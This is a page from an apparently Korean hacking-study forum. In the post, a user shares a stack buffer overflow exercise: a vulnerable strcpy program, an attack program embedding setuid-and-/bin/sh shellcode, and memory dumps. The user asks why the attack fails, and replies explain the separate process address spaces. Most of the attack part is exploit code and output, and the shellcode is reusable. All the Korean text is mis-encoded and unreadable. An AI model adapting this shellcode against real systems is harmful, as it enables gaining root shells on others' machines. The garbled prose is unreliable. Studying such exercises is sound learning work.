½Ã½ºÅÛ ÇØÅ·

 1574, 77/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   answp
   http://a
   ½Ã½ºÅÛ ÇØÅ· ½Ãµµ Çߴµ¥ ½ÇÆÐÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú½À´Ï´Ù¤Ð¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1003 [º¹»ç]


/* a.c ÄÚµå ÀÔ´Ï´Ù.*/
#include <stdio.h>
#include "dumpcode.h"
#include <stdlib.h>

int main(int argc, char *argv[])
{
  char buf[10];
  strcpy(buf, argv[1]);
  dumpcode(buf, 100);
  return 0;
}



/* attack.c ÄÚµå ÀÔ´Ï´Ù.*/

#include <stdio.h>
#include <stdlib.h>
#include "dumpcode.h"


int main(void)
{
  char shellcode[]="\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int addr;
  char buffer[1024];
  int num=28;

  memset(buffer, 0, 1024);
  memset(buffer, 'A', num);

  addr=(int)shellcode;
  buffer[num++]=addr & 0xff;
  buffer[num++]=(addr>>8) & 0xff;
  buffer[num++]=(addr>>16) & 0xff;
  buffer[num++]=(addr>>24) & 0xff;

  dumpcode(shellcode, 100);
  execl("./a", "./a", buffer, NULL);
  return 0;
}



[root@localhost test]$ ./attack
0xbfffdfa0  31 c0 b0 31 cd 80 89 c3 89 c1 31 c0 b0 46 cd 80   1..1......1..F..
0xbfffdfb0  eb 1f 5e 89 76 08 31 c0 88 46 07 89 46 0c b0 0b   ..^.v.1..F..F...
0xbfffdfc0  89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd   ...N..V...1...@.
0xbfffdfd0  80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68 00 04 08   ....../bin/sh...
0xbfffdfe0  60 53 01 40 2c 87 04 08 08 e0 ff bf 74 55 01 42   `S.@,.......tU.B
0xbfffdff0  01 00 00 00 34 e0 ff bf 3c e0 ff bf 2c 58 01 40   ....4...<...,X.@
0xbfffe000  01 00 00 00                                       ....

0xbfffdf30  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbfffdf40  41 41 41 41 41 41 41 41 41 41 41 41 a0 df ff bf   AAAAAAAAAAAA....
0xbfffdf50  00 00 00 00 94 df ff bf a0 df ff bf 2c 58 01 40   ............,X.@
0xbfffdf60  02 00 00 00 e4 82 04 08 00 00 00 00 05 83 04 08   ................
0xbfffdf70  92 85 04 08 02 00 00 00 94 df ff bf d4 85 04 08   ................
0xbfffdf80  04 86 04 08 60 c6 00 40 8c df ff bf 00 00 00 00   ....`..@........
0xbfffdf90  02 00 00 00                                       ....
Illegal instruction
[root@localhost test]$

ºÒ¹ý ¸í·É¾î¶ó°í ³ª¿À¸é¼­ ¾ÈµË´Ï´Ù. °ø°ÝÀ» ÀÚµ¿À¸·Î ¸·°í Àִ°ÇÁö
¾Æ´Ô ´Ù¸¥ ÀÌÀ¯·Î ½ÇÆÐÇÑ°ÇÁö... ¿Ö ½ÇÆÐ Çß´ÂÁö ÀÌÀ¯°¡ ±Ã±ÝÇÕ´Ï´Ù.
Âü·Î°í ·¹µåÇÞ 7,9 ¿¡¼­ µÑ´Ù ½ÇÇè ÇغýÀ´Ï´Ù. RET º¯Á¶ È®½ÇÈ÷ µÆ±¸¿ä.
shellcode ¹è¿­À» Àü¿ª º¯¼ö·Î º¯°æ ÇÏ°íµµ Çߴµ¥ ¾ÈµË´Ï´Ù.
¿ø·¡ÄÚµå´Â jmp * $esp ÄÚµåÁÖ¼Ò¸¦ ³Ö¾î¼­ ÇÏ´øµ¥ Àú´Â ±×°É 뺴°í ½Ãµµ
Çغ» °Ì´Ï´Ù. ¿Ö ½ÇÆÐ Çß´ÂÁö ÀÌÀ¯¸¦ ¾Ë°í ½Í½À´Ï´Ù.

  Hit : 4234     Date : 2009/01/11 04:58



    
md.house ¾îÁ¦µµ ±×·¯´õ´Ï, Á¦°¡ ´äº¯¸¸ ´Þ¸é ±ÛÀ» Áö¿ì½Ã³×¿ä? 2009/01/11  
answp ´ÔÀÌ ¸»¾¸ ÇÑ°Å ´Ù Çغôµ¥µµ ¾ÈµË´Ï´Ù. 2009/01/11  
md.house Á¦°¡ Áö±Ý Çغôµ¥, RET º¯Á¶´Â µÆ´Âµ¥ RET °¡ °¡¸£Å°´Â ÁÖ¼Ò¿¡ ½ÇÇà°¡´ÉÇÑ Äڵ尡 µé¾îÀÖÁö ¾Ê³×¿ä. Á¦°¡ ¾ê±âÇß´ø 2¹ø° ÀÌÀ¯¿´´Âµ¥¿ä.

Àú ÇØÅ· Çغ¼¸¸Å­ Çغ» »ç¶÷ÀÔ´Ï´Ù. Á¦°¡ ¼¼»ó ¸ðµç ÀÏÀ» ´Ù ¾Æ´Â°Íµµ ¾Æ´Ï°í Ç×»ó ¿ÇÀº°Íµµ ¾Æ´ÏÁö¸¸, ÀÌ ºÐ¾ß¿¡¼­´Â ´ÔÀÌ Àú¸¦ ¹Ï¾îµµ µÉ°Í °°Àºµ¥¿ä.
2009/01/11  
answp RET °¡¸£Å°´Â ÁÖ¼Ò¿¡ ÄÚµå´Â È®½ÇÈ÷ ÀÖ½À´Ï´Ù. ù¹ø° dumpcode °á°ú º¸½Ã¸é
¸Þ¸ð¸®¿¡ ±â°è¾î Äڵ尡 µé¾î°¡ ÀÖ´Â°Ô È®½ÇÈ÷ º¸ÀÔ´Ï´Ù.
2009/01/11  
md.house RET °¡ °¡¸£Å°´Â ÁÖ¼Ò¿¡ ÄÚµå´Â ¾ø½À´Ï´Ù. 0xbffffda0 À» ¸»¾¸ÇϽô°Ŷó¸é, RET À§Ä¡¸¦ À߸ø °è»êÇß½À´Ï´Ù. 2009/01/11  
answp bffffda0 °¡ ¾Æ´Ï¶ó bfffdfa0 ÀÔ´Ï´Ù. ¾Æ±ñ ½ÇÇà °¡´ÉÇÑ Äڵ尡 ¾ø´Ù°í ÇϼÌÀݾƿä
bfffdfa0ºÎºÐ º¸¸é shellcode °¡ ÀÖ½À´Ï´Ù. ±×¸®°í bfffdfa0¸¦ ¸®ÅÏ ¾îµå·¹½º ºÎºÐ¿¡
¾È³Ö°í jmp * $esp ³ÖÀ¸¸é ¼º°øÇÕ´Ï´Ù. ´ÜÁö ¿Ö bfffdfa0³Ö¾úÀ»¶© ¿Ö ¾ÈµÉ±î°¡ ±Ã±ÝÇÑ°ÅÁÒ
2009/01/11  
sjh21a attack buffer != a buffer 2009/01/12  
sjh21a °¢ ÇÁ·Î¼¼½º´Â °¢°¢ÀÇ °¡»ó ¸Þ¸ð¸® °ø°£À» °®½À´Ï´Ù. 2009/01/12  
hahah ½©ÄÚµå´Â attack¿¡¼­¸¸ Á¸ÀçÇÏ´Â º¯¼öÀÏ»ÓÀÌÁÒ. execl·Î a¸¦ ½ÇÇàÇÏ¸é ±× º¯¼ö´Â ´õÀÌ»ó Á¸ÀçÇÏÁö ¾Ê½À´Ï´Ù. a.c¿¡ ÀÖ´Â dumpcodeÃâ·ÂÀ» Á»´õ Çغ¸¼¼¿ä. 0xbfffdfa0¿£ ½©ÄÚµå ¾øÀ»°Ì´Ï´Ù. 2009/01/12  
answp ¿À¤Ñ¤Ñ Àû¾îµµ ÀÌ·± ´ä À» ¿øÇß´Ù±¸¿ä~ 2009/01/12  
answp ±Ùµ¥ ¾î°¼­ ·¹µåÇÞ7¿¡¼± eggshell ·Î´Â ¼º°øÀ» ÇÒ±î¿ä? eggshell À̶û a.c ÆÄÀÏÀ̶û ¸Þ¸ð¸®°¡ ´Ù¸¦ÅÙµ¥¿ä 2009/01/12  
54   ¼±¹è´Ô! Àü¿¡Áú¹®Çѳ»¿ëÀä..Áß¿äÇÑ°ÍÀº...     appleone
01/14 2891
53   Àú±â¿ä ¼±¹è´Ôµé!Á¶¾ðÁ»^^     appleone
01/15 3319
52   ÷¿Ã¸®´Â °Çµ¥¿è °¥ÄÑÁÖ¼¼¿è....[3]     applegive
06/15 3070
51   Á¤¸» ±Ã±ÝÇѵ¥..[2]     apple0815
03/22 3527
50   ¹öÆÛ ¿À¹öÇ÷ο쿡 °üÇÑ Áú¹®ÀÔ´Ï´Ù. µµ¿òºÎŹµå·Á¿ä[6]     APlusHacker
02/08 3834
49     [re] ÇØÅ·¿¡´ëÇÑ À߸øµÈ ¾ð¾î»ç¿ë ÀÎÅÍºä ¿äû[1]     answp
12/25 3019
48     [re] Åڳݸ»°í Á¢¼Ó¹ýÀÌ ¹¹ÀÖÁÒ?[2]     answp
12/27 3189
47   RET Áú¹® ÀÔ´Ï´Ù.     answp
01/11 3180
  ½Ã½ºÅÛ ÇØÅ· ½Ãµµ Çߴµ¥ ½ÇÆÐÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú½À´Ï´Ù¤Ð¤Ð[11]     answp
01/11 4233
45   ¿ìºÐÅõ ¸®´ª½º return address À§Ä¡¸¦ ¾Ë ¼ö ¾øÀ»±î¿ä?     answp
03/23 3949
44   ½ºÅð¡µå³ª ½ºÅà ½¯µå[1]     answp
10/19 5013
43   ÆÐÅ·µÇ¾îÀÖ´Â°É ¾ðÆÐÅ·ÇÏ¸é ºÒ¹ýÀΰ¡¿ä?[3]     answp
09/18 3688
42   C++ÀÇ coutµµ Æ÷¸ä½ºÆ®¸µ Ãë¾àÁ¡ÀÌ ÀÖ³ª¿ä?[2]     answp
11/24 3628
41   ÇØÅ· °ø°ÝÀÇ ¿¹¼ú Áú¹® °íµîÇлý!!1[2]     anona
03/15 3406
40   ¼­¹ö °ø°ÝÀÚ ¾ÆÀÌÇǸ¦ ¾Ë¾Æ³Â½À´Ï´Ù[11]     andud11
05/07 4262
39   xssÇØÅ·¿¡°üÇØ Áú¹®µå¸³´Ï´Ù[1]     alstkd1222
01/19 4056
38   À©µµ¿ìÁî ÇØÅ·, ¸®´ª½º ÇØÅ·¿¡ °üÇؼ­..[2]     albert89
12/02 4058
37   °×¹æ¿¡°­µµ°¡µé¾ú´Âµ¥[5]     aladdin2
03/17 4775
36     [re] °×¹æ¿¡°­µµ°¡µé¾ú´Âµ¥     aladdin2
03/19 3784
35       [re] °×¹æ¿¡°­µµ°¡µé¾ú´Âµ¥[1]     aladdin2
03/19 3918
[1]..[71][72][73][74][75][76] 77 [78][79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org